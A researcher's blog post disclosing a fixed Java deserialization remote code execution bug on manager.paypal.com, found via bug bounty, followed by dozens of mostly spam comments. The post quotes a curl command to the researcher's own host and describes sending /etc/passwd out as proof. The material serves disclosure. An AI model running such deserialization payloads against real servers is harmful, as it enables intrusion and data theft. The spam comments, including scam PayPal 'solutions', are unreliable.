Monday, January 25, 2016

[manager.paypal.com] Remote Code Execution Vulnerability


In December 2015, I found a critical vulnerability in one of PayPal business websites (manager.paypal.com). It allowed me to execute arbitrary shell commands on PayPal web servers via unsafe JAVA object deserialization and to access production databases. I immediately reported this bug to PayPal security team and it was fixed promptly.

Details


While testing manager.paypal.com application, I noticed an unusual post form parameter “oldFormData” that looks like a complex object after base64 decoding:

The following research showed that it is a Java serialized object without any signature. It means you can send a serialized object of any existing class to the server, and the “readObject” (or “readResolve”) method of that class will be called. For exploitation, you need to find a suitable class in the application “classpath” which can be serialized and has something interesting (from exploitation point of view) in the “readObject” method. You can read about this technique in the recent article by FoxGlove Security. A year ago, Chris Frohoff (@frohoff) and Gabriel Lawrence (@gebl) did a great job and found suitable classes in Commons Collections library that could lead to remote code execution. They also published the “ysoserial” payload generation tool on their github page.

Exploit


I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.


Then I sent the base64 encoded payload in the “oldFormData” parameter to the application server and was impressed by an incoming request from the PayPal network that appeared in my NGINX access log:


I realized that I could execute arbitrary OS commands on the web servers of manager.paypal.com, establish a back connection to my own Internet server and, for example, upload and execute a backdoor. As a result, I could get access to production databases used by the manager.paypal.com application.

Instead, I just read “/etc/passwd” file by sending it to my server as a proof of the vulnerability:


I also recorded a video how to reproduce this vulnerability and reported it to the PayPal security team.
Later, I found out that many other endpoints of the manager.paypal.com application also use serialized objects and can be exploited as well.

In a month, my report received a Duplicate status because another researcher, Mark Litchfield, reported a similar vulnerability two days earlier than I did (on December 11, 2015). PayPal decided to pay me a good bounty anyway, and I have nothing but respect for them.

Demo


66 comments:

  1. Did they pay you thru paypal? :)

    ReplyDelete
  2. Very nice work. It would be cool if you would reference advice on how to fix a Java serialization vulnerability. A Google search gave me poor results in the first page :(
    https://www.google.co.uk/search?q=how+to+fix+a+java+serialization+vulnerability
    Otherwise we can expect the improvements to be very slow....

    ReplyDelete
    Replies
    1. 1. Identify any jar or class files that contain the vulnerable library e.g cd && grep -Rl 'InvokerTransformer' . | grep -E "\.(jar|class)"
      2. Delete (dry run first) the file InvokerTransformer.class within any JARs you found in Step 1.

      Delete
  3. The problem lies with the Serialization api itself.

    https://github.com/pfirmstone/river-internet/tree/Input-validation-for-Serialization/src/org/apache/river/api/io

    ReplyDelete
  4. Nice content with valuable information. Thanks for sharing.
    Java Training institute in Velachery

    ReplyDelete
  5. If you set out to make me think today; mission accomplished! I really like your writing style and how you express your ideas. Thank you. Hamza PayPal Solutions - Remove Limit From PayPal Easily - Receive Payment & Withdrawal. paypal solutions

    ReplyDelete
  6. which tool was that?
    >I downloaded this tool and generated a simple payload that sends DNS and HTTP requests to my own server by executing the “curl x.s.artsploit.com/paypal” shell command.

    ReplyDelete
  7. For niit projects, assignments, cycle tests, lab@homes, c#, html, java, java script, sql, oracle and much more visit http://gniithelp.blogspot.in or https://mkniit.blogspot.in

    ReplyDelete
  8. This is my first visit to your blog, your post made productive reading, thank you.
    Java Training in Chennai

    ReplyDelete
  9. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work. youtube converter

    ReplyDelete
  10. Thanks for sharing your valuable time for us, nice article and blog.
    Java Training in Chennai

    ReplyDelete
  11. Good post, apart for programming bugs paypal and stripe too, are common online payments platforms....
    I would be looking forward for similar post for stripe too...
    Thanks

    ReplyDelete
  12. Nice and good article.. it is very useful for me to learn and understand easily.. thanks for sharing your valuable information and time.. please keep updating.morephp jobs in hyderabad.
     

    ReplyDelete
  13. You CAN increase your overall penis length and girth. Using an penis extender can also improve sexual performance and stamina through the process of cell division which can improve blood flow to the penis. Our Peyronies Editions are highly recommended penis straightener devices.

    ReplyDelete
  14. I love reading an article that will make men and women think. Also, many thanks for allowing for me to comment!
    https://powerseotools.blogspot.com/

    ReplyDelete

  15. Ethereumpro.net is best company in the united kingdom to Exchange Ethereum to Cash USD Paypal Payoneer Bank Account, sell your ethereum at best price for paypal transfer

    Exchange Ethereum to Paypal or cash

    ReplyDelete
  16. I would like to say that this blog really convinced me, you give me best information! Thanks, very good post.
    exchange paypal
    Keep Posting:)

    ReplyDelete
  17. • Nice and good article. It is very useful for me to learn and understand easily. Thanks for sharing your valuable information and time. Please keep updating. Power Bi Online course Bangalore

    ReplyDelete
  18. Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! name patches

    ReplyDelete
  19. I think about it is most required for making more on this get engaged complete bathroom installations

    ReplyDelete
  20. I think about it is most required for making more on this get engaged vector

    ReplyDelete
  21. I think about it is most required for making more on this get engaged custom military patches

    ReplyDelete
  22. We are really grateful for your blog post. You will find a lot of approaches after visiting your post. Great work Hate Story 4 Watch Online

    ReplyDelete
  23. Well we really like to visit this site, many useful information we can get here. best mechanical keyboard under 100

    ReplyDelete
  24. I was taking a gander at some of your posts on this site and I consider this site is truly informational! Keep setting up.. portrait retouching service(s)

    ReplyDelete
  25. Regular visits listed here are the easiest method to appreciate your energy, which is why why I am going to the website everyday, searching for new, interesting info. Many, thank you! putlocker today

    ReplyDelete
  26. Here at this site really the fastidious material collection so that everybody can enjoy a lot. Happy mothers day images and quotes

    ReplyDelete
  27. This is really very nice post you shared, i like the post, thanks for sharing.. Online Calendar

    ReplyDelete
  28. Cool stuff you have and you keep overhaul every one of us more info

    ReplyDelete
  29. I’ve read some good stuff here. Definitely worth bookmarking for revisiting. I surprise how much effort you put to create such a great informative website. Nutzfahrzeuge Ankauf

    ReplyDelete
  30. Hi! This is my first visit to your blog! We are a team of volunteers and new initiatives in the same niche. Blog gave us useful information to work. You have done an amazing job! investment companies in bahrain

    ReplyDelete
  31. this blog was really great, never seen a great blog like this before. i think im gonna share this to my friends.. what is guest post service

    ReplyDelete
  32. Hi buddies, it is great written piece entirely defined, continue the good work constantly. shari'ah compliant investment

    ReplyDelete
  33. A debt of gratitude is in order for the blog entry amigo! Keep them coming... Happy Mothers Day Quotes from Husband

    ReplyDelete
  34. A debt of gratitude is in order for the blog entry amigo! Keep them coming... tile flooring mn

    ReplyDelete
  35. Personally I think overjoyed I discovered the blogs. what day today

    ReplyDelete
  36. Your work is very good and I appreciate you and hopping for some more informative posts reseller

    ReplyDelete
  37. I read this article. I think You put a great deal of exertion to make this article. I like your work. Bewertungen kaufen

    ReplyDelete
  38. This is truly an practical and pleasant information for all. Thanks for sharing this to us and more power Happy Ramadan Greetings 2018

    ReplyDelete
  39. The article posted was very informative and useful. You people are doing a great job. Keep going. Happy Ramadan Wishes 2018

    ReplyDelete
  40. I see some amazingly important and kept up to length of your strength searching for in your on the site happy mothers day to my sister

    ReplyDelete
  41. Here you will learn what is important, it gives you a link to an interesting web page: Los Angeles photo booth rentals

    ReplyDelete
  42. Thanks for the post and great tips: even I also think that hard work is the most important aspect of getting success.....Happy Eid Mubarak HD Wallpaper 2018


    ReplyDelete
  43. Amazing article. I was pondering about this so I'm exceptionally glad I discovered your site.....Ramadan 2018 Wallpapers and Ramadan Mubarak Wallpapers



    ReplyDelete
  44. wow... what a great blog, this writter who wrote this article it's realy a great blogger, this article so inspiring me to be a better person Portrait Retouching

    ReplyDelete
  45. The blog and data is excellent and informative as well november events

    ReplyDelete
  46. Wonderful illustrated information. I thank you about that. No doubt it will be very useful for my future projects. Would like to see some other posts on the same subject! 7 Eleven Day

    ReplyDelete
  47. A debt of gratitude is in order for giving late reports with respect to the worry, I anticipate read more. falls creek packages

    ReplyDelete
  48. hi was just seeing if you minded a comment. i like your website and the thme you picked is super. I will be back.
    Dubai Hotel Booking Godesto

    ReplyDelete
  49. Fantastic blog! Do you have any tips and hints for aspiring writers? I’m planning to start my own website soon but I’m a little lost on everything. Would you propose starting with a free platform like WordPress or go for a paid option? There are so many options out there that I’m completely overwhelmed .. Any suggestions? Many thanks!
    Automatic Cat Feeder

    ReplyDelete
  50. Wonderful illustrated information. I thank you about that. No doubt it will be very useful for my future projects. Would like to see some other posts on the same subject! Graco 4Ever 4-in-1 Convertible Car Seat website coupon codes

    ReplyDelete
  51. Interesting topic for a blog. I have been searching the Internet for fun and came upon your website. Fabulous post. Thanks a ton for sharing your knowledge! It is great to see that some people still put in an effort into managing their websites. I'll be sure to check back again real soon.
    Article Rewriter

    ReplyDelete
  52. Wonderful illustrated information. I thank you about that. No doubt it will be very useful for my future projects. Would like to see some other posts on the same subject! private label manufacturers

    ReplyDelete
  53. Thanks a lot for one’s intriguing write-up. It’s actually exceptional. Searching ahead for this sort of revisions. PhenQ Ingredients

    ReplyDelete
  54. Great Article it its really informative and innovative keep us posted with new updates. its was really valuable. thanks a lot.
    safari deals

    ReplyDelete
  55. I am very enjoyed for this blog. Its an informative topic. It help me very much to solve some problems. Its opportunity are so fantastic and working style so speedy. lån 10000 kr


    Thanks for the nice blog. It was very useful for me. I'm happy I found this blog. Thank you for sharing with us,I too always learn something new from your post. hp driver

    ReplyDelete
  56. Wow! Such an amazing and helpful post this is. I really really love it. It's so good and so awesome. I am just amazed. I hope that you continue to do your work like this in the future also. wordpress autoblog setup

    ReplyDelete
  57. Thanks for the nice blog. It was very useful for me. I'm happy I found this blog. Thank you for sharing with us,I too always learn something new from your post. Zwembaden

    Thanks for taking the time to discuss that, I feel strongly about this and so really like getting to know more on this kind of field. Do you mind updating your blog post with additional insight? It should be really useful for all of us.Airco

    I was surfing net and fortunately came across this site and found very interesting stuff here. Its really fun to read. I enjoyed a lot. Thanks for sharing this wonderful information.Zonnepanelen

    ReplyDelete
  58. I feel really happy to have seen your webpage and look forward to so many more entertaining times reading here. Thanks once more for all the details. AC Market

    ReplyDelete
  59. Thank you very much for the sharing! COOL..
    lån 50000 kr

    ReplyDelete